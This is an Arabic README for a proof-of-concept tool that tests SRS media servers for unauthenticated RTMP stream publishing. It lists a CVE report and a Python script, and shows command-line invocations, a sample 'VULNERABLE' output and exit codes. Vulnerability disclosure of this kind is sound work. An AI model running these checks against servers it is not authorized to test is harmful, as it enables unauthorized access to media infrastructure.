
PoC مستقل لخاصية النشر عبر RTMP دون مصادقة في خوادم SRS للوسائط؛ يتحقق من الثغرة الأمنية، ويدعم فحص القناة الجانبية عبر واجهة HTTP API، ويتيح اختبار الاختراق المصرح به.
| الملف | الغرض |
|---|
CVE_Report_SRS_Unauth_Publish.md | تقرير الثغرة |
poc_srs_unauth_publish.py | PoC مستقل بلغة Python 3 يستخدم المكتبة القياسية فقط |
قم بتشغيل هذا فقط ضد الأنظمة المصرح لك باختبارها.
python poc_srs_unauth_publish.py --host 127.0.0.1 --stream cve_2026_68004_poc
معرض للثغرة:
[+] VULNERABLE: received NetStream.Publish.Start
مع فحص القناة الجانبية لواجهة برمجة التطبيقات HTTP:
python poc_srs_unauth_publish.py --host TARGET --check-api --json
رمز الخروج: 0 = تم تأكيد النشر، 2 = غير مؤكد.
HongYuan Liu [email protected]